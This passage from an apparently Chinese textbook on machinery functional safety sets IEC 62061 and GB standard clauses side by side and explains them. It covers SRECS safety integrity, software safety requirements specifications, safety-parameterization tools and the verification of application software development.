probability of dangerous failure of each SRCF due to dangerous random hardware failures shall be estimated taking into account: a) the architecture of the SRECS as it relates to each SRCF under consideration; b) the estimated rate of failure of each subsystem to perform its allocated function block(s) in any modes which would cause a dangerous failure of the SRECS. 6.6.3.2.3 The estimation of the probability of dangerous failure shall be based on the probability of dangerous random hardware failure of each relevant subsystem as derived using the information required in 6.7.2.2 including,where appropriate 6.7.2.2 k),for digital data communication processes between subsystems.The probability of dangerous random hardware failure of the SRECS is the sum of the probabilities of dangerous random hardware failure of all subsystems involved in the performance of the SRCF and shall include,where appropriate,the probability of dangerous transmission errors for digital data communication processes: 6.6.3.3 Architectural constraints The SIL achieved by the SRECS according to the architectural constraints is less than or equal to the lowest SILCL of any subsystem (see 6.7.6) involved in the performance of the SRCF. 6.6.3.4 Systematic safety integrity The SIL achieved by the SRECS is less than or equal to the lowest SILCL of any subsystem involved in the performance of the SRCF. 【GB标准条款】 6.6.3 SRECS安全完整性评估要求 6.6.3.1 概述 由SRECS实现的SIL,对于每一个SRCF应认为由SRECS分别完成。 由SRECS实现的SIL应由子系统的危险随机硬件失效概率、体系结构限制和构成SRECS的子系统的系统安全完整性来确定。已实现的SIL小于或等于系统安全完整性和体系结构限制的任何子系统的最低SILCL值。 6.6.3.2 硬件安全完整性 6.6.3.2.1 由危险随机硬件失效而导致的各SRCF危险失效概率应等于或小于安全要求规范规定的目标失效值。 6.6.3.2.2 由危险随机硬件失效而导致的各SRCF危险失效概率评估,应该考虑下列因素: a)与各SRCF相关的SRECS的体系结构; b)各子系统执行其分配功能块的失效概率的估计值,即在任何模式下执行其配置的功能块都可能引起SRECS的危险失效。 6.6.3.2.3 危险失效概率的评估应基于各相关子系统危险随机硬件失效概率,使用6.7.2.2中要求的信息得出,包括子系统之间数字数据通信过程,见6.7.2.2 k)项。SRECS的危险随机硬件失效概率(每小时危险失效概率)为参与执行SRCF的所有子系统危险随机硬件失效概率的和,适当时,还应包括数字数据通信过程中危险传输错误的概率: 6.6.3.3 体系结构限制 根据体系结构限制,由SRECS实现的SIL小于或等于参与执行SRCF的任何子系统的最低SILCL(见6.7.6)。 6.6.3.4 系统安全完整性 SRECS实现的SIL小于或等于参与执行SRCF的任何子系统的最低SILCL。 SRECS的安全完整性等级(SIL)主要由子系统的危险随机硬件失效概率、体系结构限制和构成SRECS的子系统的系统安全完整性来确定。子系统的危险随机硬件失效概率应小于或等于安全要求规范规定的目标失效值。体系结构限制主要是指结构上引起的对功能安全完整性等级的限制,即一个SRECS的SIL应该小于或等于参与执行SRCF的任意一个子系统的最低SILCL。例如,将分别是SIL2和SIL3的两个子系统串联起来,只能得到SIL2的系统。构成SRECS的子系统的系统安全完整性中等级最低的SILCL是SRECS实现的SIL。 由危险随机硬件失效导致的各SRECS危险失效概率的评估影响因素包括SRECS本身的体系结构和子系统中不同功能块失效概率的估计值。功能块在执行的过程中很容易引起SRECS的危险失效。 SRECS危险失效概率的评估与相关子系统危险随机硬件失效概率有关,按照标准其计算方式如下。 PFHD=PFHD1+…+PFHD+P nTE 即SRECS的危险随机硬件失效概率为参与执行SRCF的所有子系统的危险随机硬件失效概率的和。除此之外,还应包括数字数据通信过程中危险传输错误的概率。 4.4 软件安全要求规范 在开发SRECS安全相关控制功能软件时,需要明确软件安全要求规范的具体内容。 为了实现SRECS中安全相关控制功能的任意部分软件,应该先开发软件安全要求规范,并通过撰写形成文档。文档应包括: 功能块结构的详细描述; 各个功能块的安全要求,包括功能要求和安全完整性要求; 各功能块输入和输出的定义,如速度、位置、操作模式等。 软件安全要求规范的具体内容如下。 1. 要求一 SRECS安全要求规范规定各个SRCF应分解成一个或多个功能块,同时各个功能块的安全要求都应该对应SRCF在安全要求规范中的规定,即功能要求和安全完整性要求。因此,在开发每个子系统的软件功能块之前,都应该先开发软件功能块安全要求规范,即软件功能要求规范和软件安全完整性要求规范。 2. 要求二 当需要设计子系统的软件安全要求规范时,规范内容主要来自以下3个方面。 1)SRECS规定的安全要求 例如,硬件安全完整性要求,包括硬件安全完整性体系结构限制要求和危险随机硬件失效概率要求;系统安全完整性要求,包括失效避免要求和系统故障控制要求;检测SRECS故障行为的要求;相关软件设计和开发要求。 2)SRECS体系结构要求 例如,SRECS体系结构的各个功能块应配置到SRECS体系结构的子系统中,其中每个功能块都应该被清楚地标识。同时,体系结构的设计应该有记录文档,以描述其子系统及其功能块之间的相互关系。除此之外,子系统的安全要求应该是为其配置的各个功能块的安全要求,各个功能块的安全要求都应该对应SRCF在安全要求规范中的规定。如果子系统配置多个功能块,那么最高的安全完整性要求适用。 3)功能安全计划中的任何要求 一个详细的功能安全计划应包括以下要求。 (1)明确SRCF的具体要求、SRECS的整体设计、SRECS的使用信息、SRECS的验证方法,以及不符合要求时的整改流程。 (2)制定功能安全计划执行方针和策略。 (3)描述应用软件开发、集成、验证和确认的策略,以实现功能安全。 (4)明确执行(1)中每项活动并审核人员、部门、其他单位或资源的要求。 (5)明确记录或保存SRECS功能安全相关信息的流程和资源,如: ·风险识别或风险评估结果; ·用于实现安全要求的相关功能设备; ·负责保持功能安全的组织; ·达到和保持功能安全的必要流程。 (6)描述相关组织的配置管理策略,如组织的内部架构、授权人员等。 (7)建立确认计划,包括: ·要进行确认的细节; ·执行确认的人员、部门或单位; ·确认策略和技术的选择; ·测试设备的选择; ·确认活动的选择; ·验证的准则; ·用于确认结果的评估手段和方法。 (8)建立验证计划,包括: ·要进行验证的细节; ·明确机器相关操作模式(正常操作、设置等); ·违反SRECS有效性时的要求; ·验证的技术策略,如静态测试的分析方法; ·验收的准则; ·按照可接受原则,明确出现失效时要采取的行动。 3. 要求三 要开发出在SRECS或其子系统中安全可靠的应用软件,就要在整个开发周期中尽早地建立相关的组织和规则,对软件开发周期中的各种活动加以规范,主要包括以下方面的内容。 (1)系统结构接口。 (2)软件规格。 (3)既有软件。 (4)软件设计。 (5)编码。 本要求的具体内容参考4.2.1节中的“安全相关软件设计和开发要求”部分。 4. 要求四 软件开发人员在检查软件安全要求规范时,要确保规范中的每个要求都有充分的描述,尤其要对下面内容进行重点确认。 (1)系统的结构和配置,包括机械安全相关系统的具体组成部分,以及每个部分中设备的具体配置情况。例如,生产自动化系统由3部分组成,分别是过程控制自动化部分、基础自动化部分及传动控制部分,其中基础自动化部分由9个主控制站组成,每个主控制系统均采用美国GE FANUC公司的PLC产品PACSystem RX7i控制器,而控制器CPU采用的是高性能的Pentium Ⅲ处理器等。 (2)系统的响应时间及系统对内存容量大小的要求。 (3)系统设备及人机交互界面要求。 (4)机器操作的所有相关模式。 (5)系统的诊断装置元器件,如传感器和执行器等。 5. 要求五 软件安全要求应该表达清晰,不存在含糊的描述语,其结构应该是可验证、可测试、可修改、可操作的,并有相应的安全完整性等级。除此之外,软件安全要求和结构可以一一追溯到SRECS的安全要求规范。 6. 要求六 软件安全要求规范应表达对每个子系统的特性要求,然后选择正确的仪器设备完成对子系统的硬件设计,并对系统软件的SRCF要求逐一进行规定:规定每个子系统中所有功能模块实现的功能;规定每一个功能模块的输入/输出接口;规定每一个功能模块的输入/输出数据的格式和数值范围,并说明与其他功能模块的连接关系;规定系统每一个功能模块的限制数据,如最大响应时间;规定子系统实现SRECS范围内的诊断装置(传感器和最终元件等)的诊断功能;规定能让机器保持安全稳定运行状态的功能;规定系统有关检测、通告和处理故障的功能;规定系统SRCF在线和离线的周期测试功能;规定未经过授权,禁止修改SRECS的功能;规定系统中的非SRCF接口;规定好系统的响应时间及系统内存容量等。 7. 要求七 形式化方法通过使用形式逻辑、离散数学及计算机可读的描述语言来进行软件需求描述和验证。形式化方法的应用主要涉及两方面的活动:形式化建模和形式化分析,这两方面的工作基于一些精准的数学方程来实现。 半形式化方法就是用一种受限制的句法语言来书写,并且通常伴随着支持性的解释(非形式化)语句。这里的受限制句法语言可以是带有受限制句子结构和特殊意义关键字的自然语言,也可以是图表式的语言(数据流图、状态转换图、实体关系图、数据结构图、流程图、功能模块图、程序结构图或序列图表)。无论是基于图表还是基于自然语言,句法限制都必须用一套规范来定义。 4.5 软件的设计和开发 软件的设计和开发主要包括三大部分:分别是嵌入式软件的设计和开发、参数化软件要求及应用软件的设计和开发。 4.5.1 嵌入式软件的设计和开发 【IEC标准条款】 6.11.1 Embedded software design and development Embedded software incorporated into subsystems shall comply with IEC 61508-3 as appropriate for the required SIL. 【GB标准条款】 6.11.1 嵌入式软件设计和开发 并入子系统的嵌入式软件应符合IEC 61508-3,要求的SIL应适当。 子系统的嵌入式软件应符合IEC 61508-3标准的规定。例如,对软件安全生命周期的要求如下。 软件安全生命周期应根据IEC 61508-3第6章在编制安全计划期间进行选择和规定。 质量和安全保障规程应集成到软件安全生命周期活动中。 软件安全生命周期的各个阶段应根据各阶段规定的范围、输入和输出分成基本的活动。 在本条款所有目的和要求可以满足时,运行不同于IEC 61508组织结构的以其他方式编排软件的工程项目。 对于软件安全生命周期的每个阶段,都应使用适当的技术和措施。 软件安全生命周期中的活动结果应文档化。 如果在软件安全生命周期的任一阶段要求前一阶段改变,则应重复执行软件安全生命周期的前一阶段和随后的阶段。 其他要求详见标准IEC 61508-3。 4.5.2 参数化软件要求 【IEC标准条款】 6.11.2 Software based parameterization 6.11.2.1 Software based parameterization of safety-related parameters shall be considered as a safety-related aspect of SRECS design that is described in the software safety requirements specification (see 6.10).Parameterization shall be carried out using a dedicated tool provided by the supplier of the SRECS or the related subsystem(s).This tool shall have its own identification (name,version,etc.).The parameterization tool shall prevent unauthorized modification,for example by using a password. 6.11.2.2 The integrity of all data used for parameterization shall be maintained.This shall be achieved by applying measures to -control the range of valid inputs; -control data corruption before transmission; -control the effects of errors from the parameter transmission process; -control the effects of incomplete parameter transmission;and -control the effects of faults and failures of hardware and software of the tool used for parameterization. 6.11.2.3 The tool used for parameterization shall fulfil the following requirements: -all relevant requirements for a subsystem according to this standard to ensure correct parameterization;or -a special procedure shall be used for setting the safety-related parameters.This procedure shall include confirmation of input parameters to the SRECS by either: ·retransmitting the modified parameters to the parameterization tool; ·or other means to confirm the integrity of the parameters; ·subsequent confirmation (e.g.by a suitably skilled person and an automatic check by a parameterization tool); -the software modules used for encoding/decoding within the transmission/retransmission process and software modules used for visualization of the safety-related parameters to the user shall as a minimum use diversity in function(s) to avoid systematic failures. 6.11.2.4 Documentation of software based parameterization shall indicate data used (e.g.pre-defined parameter sets) and information necessary to identify the parameters associated with the SRECS,the person(s) carrying out the parameterization together with other relevant information such as date of parameterization. 6.11.2.5 The following verification activities shall be applied for software based parameterization: -verification of the correct setting for each safety-related parameter (minimum,maximum and representative values); -verification that the safety-related parameters are checked for plausibility,for example by detection of invalid values,etc.; -verification that unauthorized modification of safety-related parameters is prevented; -verification that the data/signals for parameterization are generated and processed in such a way that faults cannot lead to a loss of SRCF(s). 【GB标准条款】 6.11.2 参数化软件 6.11.2.1 有关安全参数的软件参数化被认为是SRECS设计的安全方面,SRECS设计在软件安全规范中有所描述。参数化应使用SRECS或相关子系统的供方提供的专用工具进行。该工具应有属于自己的标识(名称、版本等)。参数化工具将防止未经授权的修改。例如,使用密码。 6.11.2.2 应保持用于参数化使用的所有数据的完整性。应采用下列措施实现: ——控制有效输入的范围; ——控制数据传输前的损坏; ——控制参数传输过程的错误影响; ——控制参数传输不完整的影响; ——控制参数化所用工具的软件、硬件故障及失效影响。 6.11.2.3 用于参数化的工具应满足下列要求: ——遵循本标准对子系统所有相关要求,以确保正确的参数化。 ——应使用特别程序设置有关安全参数。该程序应包括通过下列途径确认SRECS的输入参数。 a)将已修改的参数再传给参数化工具; b)用其他方法确认参数完整性; c)随后的确认(例如,经合适的技术人员和参数化工具的自动检查)。 ——在传送/重传过程中用于编码/译码的软件模块和用于用户安全相关参数可视化的软件模块,应最低限度地发挥功能多样性,以预防系统失效。 6.11.2.4 基于软件的参数化文档应指明使用的数据(例如预定义的参数集)和识别与SRECS相关的参数信息、执行参数化的人员连同其相关信息,例如参数化日期。 6.11.2.5 基于软件参数化应采用下列验证活动: ——验证正确设置每个安全相关参数(最小、最大和典型值); ——验证安全相关参数合理性检查,例如用无效值等检测; ——验证防止安全相关参数的未经授权修改; ——验证作为参数化数据/信号的产生和处理,故障不能导致SRCF损失。 软件由可执行目标代码和数据组成,可能包括一个或多个构型项。参数化数据项是指那些不需要修改可执行目标代码就可以改变软件行为并且能够被处理成单独构型项的数据集。也就是说,在讨论参数化数据项及可执行目标代码时,参数化数据项不是可执行目标代码的组成部分。 一个参数化数据项是由一组单独的单元组成的,其中每个单元都被赋予了唯一的值。每个单元都包含很多属性,如类型、值域或可选值集合。 参数化数据项可能包含如下用途的数据: (1)影响可执行目标代码的执行路径; (2)激活或关闭某些软件组件和功能; (3)优化软件计算过程以更好地适应系统配置; (4)用作计算的数据; (5)分别确定时间和内存的分配; (6)为软件组件提供初始值。 因此,在SRECS设计过程中,为了保证参数化数据项的使用安全,SRECS或相关子系统的软件开发者需要提供专用的工具对参数化数据项进行配置或更改,保证SRECS或相关子系统的软件参数不被错误使用,从而提高SRECS或相关子系统的安全性。除此之外,厂商开发的每个参数化工具都应该具有自己的名称及版本号,并且参数化工具的每一次使用都应该使用用户名和密码进行登录验证,从而保障参数化工具使用的安全性。 在SRECS或相关子系统软件使用参数化工具进行参数化数据项配置的过程中,为了保证软件参数化数据项在传输过程中的完整性和正确性,需要对传输过程进行检验。例如,检验参数化数据项的值的是否在有效的范围之内,参数化数据项在传输之前的值是否被更改,参数化数据项在传输过程中是否遭到篡改,参数化数据项在传输过程中的个数是否匹配,等等。 除此之外,还需要考虑参数化工具的失效情况。 在现代软件工程中,工具已经出现在软件研制过程的各个环节中。在常见的软件研制环节中,工具包括需求工具、软件设计工具、软件架构工具、软件测试工具和软件参数化工具等。对这些工具的使用可以提高软件的开发效率,并且在正确使用相关工具的条件下还能提高软件的质量。但是,工具存在错误或未能正确使用工具时,也将带来负面的影响,特别是工具的功能日益强大,人类有时已经无法对工具的输出进行直接的判断了。 因此,在工具的使用过程中,风险也是显而易见的,主要原因在于: (1)相比纯手工开发,工具的输出中隐藏的错误往往更加分散,难以被发现; (2)工具生成的软件中含有的缺陷往往难以通过手动方式排查并加以修正; (3)相比人工活动,工具产生的错误不再是偶然的,当同样的工具被用于多个项目中时,同样的错误将被成批复制。 因此,为了保证参数化数据项在传输过程中的完整性和正确性,还需要控制参数化工具软件和硬件失效的影响。一般情况下,为了规避工具的应用给数据完整性带来的风险,通常采取将对控制系统软件的要求延伸到相关工具中的方法,这一方法也可以称为鉴定,即工具鉴定。 为了防止参数化工具的失效给SRECS或相关子系统的安全性带来影响,将原来对软件的评审以确认其安全符合性的过程转为通过对工具的鉴定来完成,并由此认为其所配置的软件参数也达到了规定的安全性要求。 具体要求如下。 (1)对照标准中对子系统的所有要求,确保参数的正确性。 (2)使用专门的程序设置安全相关参数,此程序是通过下面的途径来确认SRECS的输入参数的:把已经确认好的参数再传给参数化工具;选定用其他方法来对参数的完整性进行再次确认;最后参数还需要经过技术人员的人工检查和参数化工具的自动检查。 (3)在参数的传送过程中,用于编码和解码的软件模块和用于用户安全相关参数设置的可视化模块都要对参数进行确认,以防止系统的失效。 另外,软件参数化相关文档要表明所使用数据的具体定义(预定义参数集),能识别SRECS相关参数的信息、执行参数化人员信息和其他相关信息,如参数化的日期等。 总之,SRECS或相关子系统软件的参数应该经过一系列的验证,以确保系统运行的安全,具体验证过程如下。 首先,需要验证每个安全相关参数的数值是否被正确设置,如参数的最大值、最小值及典型值。 其次,验证每个安全相关参数的数值是否在一个合理的范围之内,常用的检测方法有边界值分析法和异常值检测法。 最后,验证每个安全相关参数是否未经过授权就被修改,以防止软件参数被恶意篡改。 4.5.3 应用软件的设计和开发 1. 应用软件的设计和开发的一般要求 【标准条款】 6.11.3 Application software design and development NOTE This subclause is based on IEC 61508-3. 6.11.3.1 General requirements 6.11.3.1.1 The requirements of IEC 61508-3 apply to Full Variability Languages (FVL).The following requirements shall be applied to applications software based upon Limited Variability Languages (LVL). 6.11.3.1.2 The outcome of the activities performed during the application softwaredevelopment shall be verified at appropriate stages. 6.11.3.1.3 The design method and application language chosen to satisfy the required SIL of the SRCF shall possess features relevant for the application that facilitate: a) abstraction,modularity and other features which control complexity;wherever possible,the software shall be based on well-proven logic functions which may include user library functions and well-defined rules for linking logic functions; b) expression of -functionality,ideally as a logical description or as algorithmic functions; -information flow between modular elements; -sequencing and time related requirements; -timing constraints; -data structures and their properties,including data types,validity of data ranges; c) comprehension by developers and others who need to understand the design,both from a functional understanding of the application and from a knowledge of the constraints of the SRECS technology; d) verification and validation,including structural testing (white box) of the application software,functional testing (black box) of the integrated application program and interface testing (grey box) of the interaction with the SRECS and its application specific hardware configuration; e) safe modification. 6.11.3.1.4 Testing shall be the main verification method used for the application software.Test planning shall address the following: -the policy for verification of the integration of software and hardware; -test cases and test results; -types of tests to be performed; -test equipment including tools,support software and configuration description; -test criteria on which the completion of the test shall be judged; -physical location(s) (e.g.factory or site); -dependence on external functionality; -the amount of test cases necessary;and -completeness with respect to the related functions or requirements. 6.11.3.1.5 Where the application software is to implement both non-safety and safety-related control functions,then all of the application software shall be treated as safety-related,unless adequate independence between the functions can be demonstrated in the design. 6.11.3.1.6 The design shall include data integrity checks and reasonableness checks at the application layer (e.g.checks in communication links,bounds checking on sensor inputs,bounds checking on data parameters). 6.11.3.1.7 The application software design shall include self-monitoring of control flow and data flow unless such functions are included in the embedded software.On failure detection,appropriate actions shall be performed to achieve or maintain a safe state. 6.11.3.1.8 Where previously developed software library functions are to be used as part of the design,their suitability in satisfying the specification of requirements for software safety shall be justified.Suitability shall be based upon evidence of satisfactory operation in similar applications that have been demonstrated to have similar functionality,or shall be subject to the same verification and validation procedures as would be expected for any newly developed safety-related software.Constraints from the previous software environment (for example operating system and compiler dependencies) shall be evaluated. 6.11.3.1.9 Any modifications or changes to application software shall be subject to an impact analysis that identifies all software modules affected and the necessary re-verification activities to confirm that the software safety requirements specification is still satisfied. 【GB标准条款】 6.11.3 应用软件的设计和开发 注:本条款基于IEC 61508-3。 6.11.3.1 一般要求 6.11.3.1.1 IEC 61508-3的要求符合全可变语言(FVL)类型。下列要求适用于基于有限可变语言(LVL)类型的应用软件。 6.11.3.1.2 应用软件开发期间,执行活动的结果应在适当阶段进行验证。 6.11.3.1.3 为满足所需SRCF的SIL,选择的设计方法和应用语言应具有下列便于应用的特征: a)抽象性、模块性及其他控制复杂性的特征;可能的话,软件设计应基于经过充分验证的逻辑功能,包括用户库功能和链接逻辑功能的明确规则。 b)如下表述: ·功能性,理想地作为逻辑描述或算法函数; ·模块化元素之间的信息流; ·顺序和有关时间的要求; ·定时限制; ·数据结构及其属性,包括数据类型、数据范围的有效性。 c)开发者和其他需要懂设计的人理解,包括对应用功能性的理解和对SRECS技术限制的了解; d)验证和确认,包括应用软件的结构测试(白箱)、集成应用程序的功能测试(黑箱)、与SRECS及其特定应用硬件交互的接口测试(灰箱); e)安全修正。 6.11.3.1.4 测试是用于应用软件的主要验证方法。测试计划应包括: ——软件和硬件集成的验证策略; ——测试实例和测试结果; ——执行的测试类型; ——测试设备,包括工具、支持软件和配置说明; ——测试准则,应对完成的测试进行判定; ——实际位置(例如工厂或现场); ——外部功能性依赖; ——必要的测试实例的数量; ——相关功能或要求的完成情况。 6.11.3.1.5 如果应用软件要同时执行非安全和安全相关的控制功能,那么所有应用软件应视为安全相关,除非可以证明设计的功能之间有足够的独立性。 6.11.3.1.6 在应用层设计应包括数据完整性检查和合理性检查(例如通信链路检查、传感器输入边界检查、数据参数边界检查)。 6.11.3.1.7 应用软件设计应包括控制流和数据流的自监控,除非这类功能已经包括在嵌入式软件中。在失效检测方面,应采取恰当的行为,以达到或保持安全状态。 6.11.3.1.8 如果预先开发的软件库函数作为设计的一部分,应证明其满足软件安全要求规范的适用性。适用性应基于在已证明有类似功能的类似应用中令人满意的操作证据,或应遵循与任何新开发的安全相关软件预期相同的验证和确认程序。应评估来自先前软件环境(例如操作系统和编译器)的约束。 6.11.3.1.9 对应用软件的任何修改和变动应做影响分析,识别所有受影响的软件模块和必要的重新验证活动,以确定软件安全要求规范仍然被满足。 1)软件开发过程 软件开发过程一般包括4个子过程,分别是软件需求定义过程、软件设计过程、软件编码过程及软件集成过程。软件需求定义过程主要是把软件的系统需求转化为软件的功能需求、性能需求、软/硬件接口和安全相关需求等;软件设计过程主要是指根据软件需求、软件开发计划、软件设计标准,设计软件架构及更加具体的细节;软件编码工程主要是指将软件需求及软件架构转化为源代码的过程;软件集成过程主要是指对编写的源代码进行编译、链接,并加载到控制系统或设备中。 具体的软件开发过程如下。 (1)开发高级需求。 在进入编写代码阶段之前,需要形成正确且充分的软件需求。通常来说,软件开发过程就是将面向人类自然语言的功能和性能描述,通过逐步处理转化为计算机能够理解和执行的代码的过程。一般来说,软件需求分为高级需求和低级需求。其中软件高级需求是在软件需求定义过程中,通过直接对系统需求、软件架构、硬件接口及安全性相关需求进行抽象陈述,概念性地描述软件的功能和信息,从而形成的软件功能描述。 (2)开发软件架构。 软件架构是指在一定的设计原则基础上,从不同角度对组成软件的各部分进行搭配和安排,形成软件的多个结构和组成架构,它包括该软件的各个组件、组件的外部可见属性及组件之间的相互关系。 (3)开发低级需求。 在软件设计过程中,除了要生成软件架构,还需要对软件高级需求逐步求精,生成可以直接用程序设计语言来编写实现的软件低级需求。 (4)编写代码。 在软件代码编写过程中,根据生成的软件低级需求和软件架构,按照所挑选语言的编程规范编写代码,进而形成源代码。 (5)生成可执行目标代码,并在目标控制系统中集成。 在集成过程中,根据源代码生成可被目标控制系统处理单元直接利用的代码形式,即可执行目标代码。在完成软件集成测试后,把生成的可执行目标代码装载到目标控制系统中,进行软/硬件集成测试。 2)软件开发过程中各阶段的验证要求 在软件的开发期间,需要对各个阶段执行活动的结果一一验证,验证的具体内容包括:软件需求定义过程输出结果的验证、软件设计过程输出结果的验证、软件编码过程输出结果的验证、软件集成过程输出结果的验证。 (1)软件需求定义过程输出结果的验证。 ① 高级需求符合系统需求。 确保由软件来执行的系统功能都已经被定义,生产的软件高级需求也满足系统的功能需求、性能需求以及安全性相关需求。在验证阶段的活动中,通常可通过人工检查或再验证测试等方法来表明符合性,特别地,对于采用基于模型的开发方法的项目或者使用形式化方法表达的需求,还可以通过仿真或论证的方式表明此条目标的符合性。 ② 高级需求准确并且一致。 确保每一个高级需求都能达到定义正确、描述清晰且足够详细。此外,高级需求之间也不能存在冲突。随着研制的进行,高级需求还需要能够保持前后一致。 ③ 高级需求可验证。 所谓高级需求可验证是指需求规格说明中描述的需求都可以运用一些可行的手段对其进行验证和确认,确保定义生成的每一个软件高级需求都能够被验证和确认。 ④ 高级需求符合标准。 确保在软件需求定义过程中生成软件高级需求时,严格按照事先定义好的软件需求标准来执行,此外,如果存在与软件需求标准相偏离的地方,也能证明这些偏离的合理性和正确性。 ⑤ 高级需求可追溯到系统需求。 实现完整的追溯性是确保功能分解、缺陷定位及验证测试的基础,本目标就是为了确保软件高级需求和系统需求之间可相互追溯,为日后的修改、审查及再生产服务。符合性工作需满足每条软件高级需求均能向上追溯到一个或多个系统需求,以及每个系统需求都可向下追溯到一条或多条软件高级需求。 ⑥ 算法准确。 针对那些需要复杂算法来实现的需求,如DSP算法、地球物理模型等,一般要求在高级需求阶段对所采用的复杂算法进行论证或仿真。 (2)软件设计过程输出结果的验证。 ① 低级需求符合高级需求。 确保软件低级需求是根据软件高级需求逐步求精而得到的。 ② 低级需求准确并且一致。 确保每一个低级需求都能达到定义正确、描述清晰的目的,并且所有低级需求必须是一致的,任何一个低级需求不能和其他需求相互矛盾。随着研制的进行,低级需求还要能够前后保持一致。 ③ 低级需求与目标计算机相兼容。 低级需求往往会涉及更多软件实现层面的信息,如内存的分配、数据结构的使用等。在定义软件低级需求时,还要兼顾目标计算机中的软/硬件特性,检查它们之间是否存在冲突,以保证低级需求都能得到实现。 ④ 低级需求可验证。 确保定义生成的每一个低级需求都能够被验证。 ⑤ 低级需求符合标准。 确保在软件设计过程生成软件低级需求时,生成过程是严格按照事先定义好的软件设计标准来进行的。此外,如果存在与软件设计标准相出入的地方,也能证明这些偏离的合理性和正确性。 ⑥ 低级需求可追溯到高级需求。 确保所有高级需求都已被形成低级需求,每一项低级需求可以找到对应的高级需求。 ⑦ 软件架构与高级需求相兼容。 软件架构设计是软件设计过程中初始阶段需要完成的工作,它建立起由需求过程到设计过程的关键纽带。软件架构提供了待建系统的整体视图,用于描述软件的结构和组织、性质及连接等。架构设计信息或许不能直接反映功能需求,但是必须确认架构信息与高级需求是匹配的。检查这两者之间的兼容性,就是要分析设计的软件架构在满足软件高级需求方面的效力。 (3)软件编码过程输出结果的验证。 ① 源代码符合低级需求。 确保每句源代码都有相应的软件低级需求对应,并且都正确且完整地实现了软件低级需求的要求。 ② 源代码符合软件架构。 检查编写的源代码,确保实现软件架构中定义的数据流和控制流。 ③ 源代码可验证。 确保源代码中的每条语句和分支结构都可被验证,并且无须对源代码进行调整就可完成对源代码的验证。 ④ 源代码符合标准。 在编写源代码时严格遵守软件编码标准的要求,如参照标准中的复杂度限制和代码约束等条件。 ⑤ 源代码可追溯到低级需求。 可追溯性是需求描述的一个总体特性,它反映了相关需求的能力。编码时,软件研制人员要将逐步求精的软件需求最终用程序设计语言表示出来,这个过程需要确保每条软件低级需求都被考虑且实现。要求源代码与软件低级需求之间的可追溯性就是为了满足这个目的。 ⑥ 源代码准确并且一致。 在检查源代码时,需要对一些情况进行重点检查,包括堆栈的使用、内存的使用、定点运算的溢出和解决、浮点运算、资源争用和限制、最坏情况运行时间、异常处理、使用非初始化变量、缓冲区管理、未用变量、任务或中断冲突导致的数据冲突等,来确保源代码的准确性和一致性。 (4)软件集成过程输出结果的验证。 ① 可执行目标代码符合高级需求。 基于需求的测试可以有效地发现程序中的错误。因此,在验证可执行目标代码是否符合软件高级需求时,首先要生成正常范围的测试用例。此外,还要选择基于需求的软/硬件集成测试方法以及软件集成测试方法。执行基于需求的软/硬件集成测试是用于确保安装于目标计算机中的软件可以满足高级需求的要求。执行软件集成测试是用于确保软件成分之间能够正常交互,并且符合软件需求和软件架构。在测试时,按照测试方法规定的要求执行指定测试用例,检查测试用例执行结果是否与测试程序中给定的测试结果相同,以验证软件在目标计算机环境中面对正常输入或正常操作时是否满足高级需求。 ② 可执行目标代码对高级需求具有鲁棒性。 所谓的鲁棒性是指软件面对异常输入与条件时仍能正常工作的程度。验证可执行目标代码对高级需求是否具有鲁棒性,方法和步骤与上述目标①相同。差别在于需要使用异常范围的测试用例。此外,本目标侧重于检查软件在目标计算机环境中面对异常输入或异常操作时,可执行目标代码对软件高级需求的满足程度。 ③ 可执行目标代码符合低级需求。 与高级需求一样,在验证可执行目标代码是否符合低级需求时,首先需要设计正常范围的测试用例,此外,还需要选择基于需求的低级测试。在测试时,按照测试方法规定的要求执行指定测试用例,检查测试用例执行结果是否与测试程序中给定的测试结果相同,以验证软件在目标计算机环境中面对正常输入或正常操作时是否满足软件低级需求。 ④ 可执行目标代码对低级需求具有鲁棒性。 鲁棒性定义与上面目标②相同,叙述也与目标②类似,只是测试对象换成了低级需求。 ⑤ 可执行目标代码与目标控制系统兼容。 可执行目标代码就是将目标代码链接后形成的可执行文件,属于二进制代码。本目标是要验证可执行目标代码与目标控制系统的兼容程度,可通过执行软/硬件集成测试来实现。 3)安全相关控制功能软件设计方法和应用语言要求 安全相关控制功能软件在设计过程中采用的方法和程序设计语言应该具备以下特征,以便于应用。 (1)安全相关控制软件在设计过程中应该遵循抽象性、模块性和其他控制复杂性的原则。 软件设计的抽象性原则主要针对的是软件的高级需求,在进入代码编写阶段之前,需要形成正确且充分的软件需求。通常来说,软件开发过程就是将面向人类自然语言的功能和性能描述,通过逐步处理转化为计算机能够理解和执行的代码的过程。由于非形式化自然语言并不精确,并且存在大量的二义性,再加上人工活动在这些阶段中对输入信息的加工和转化可能引入的错误可以看作软件错误的最主要来源。因此从定义软件需求开始,将软件需求分为高级需求和低级需求。其中软件高级需求是在软件需求定义过程中,通过直接对系统需求、软件架构、硬件接口以及安全性相关需求进行抽象陈述,概念性地描述软件的功能和信息,从而形成的软件功能描述。 软件设计的模块性原则主要针对的是软件架构设计,软件架构是指在一定的设计原则基础上,从不同角度对组成软件的各部分进行搭配和安排,形成软件的多个结构和组成架构,它包括该软件的各个模块,模块的外部可见属性及模块之间的相互关系。在软件设计过程中,根据软件需求定义过程的输出——软件需求,通过一次或多次的迭代求精,直到将程序模块的层次结构、模块间的交互方式以及模块使用的数据结构都用程序设计语言来表达为止。 软件设计的其他复杂性原则主要是指在软件设计过程中,除要生成软件架构外,还需要对软件高级需求逐步求精,生成可以直接用程序设计语言来编写实现的软件低级需求,并按照所挑选的编程语言的编程规范编写代码,进而形成源代码。 为了达到软件安全性的目标,还需要对软件进行充分的验证,前面提到过,包括软件需求定义过程输出结果的验证、软件设计过程输出结果的验证、软件编码过程输出结果的验证、软件集成过程输出结果的验证,即验证软件的各种功能模块以及代码实现过程中的各种逻辑功能,看它们是否按照标准的规范规则进行定义。 (2)每一个功能模块,我们都可以用逻辑描述或用算法函数来表述;要定义好每一个功能模块的交互接口和信息流向;要规定好各个功能模块的执行顺序,以及模块的时间要求;规定好某些功能模块的定时限制要求;同时还要定义好功能模块使用的数据结构和其相关属性,包括数据类型、数据有效范围等。 (3)安全相关控制软件的设计和应用程序语言应包括应用功能性的理解和SRECS技术限制的内容。 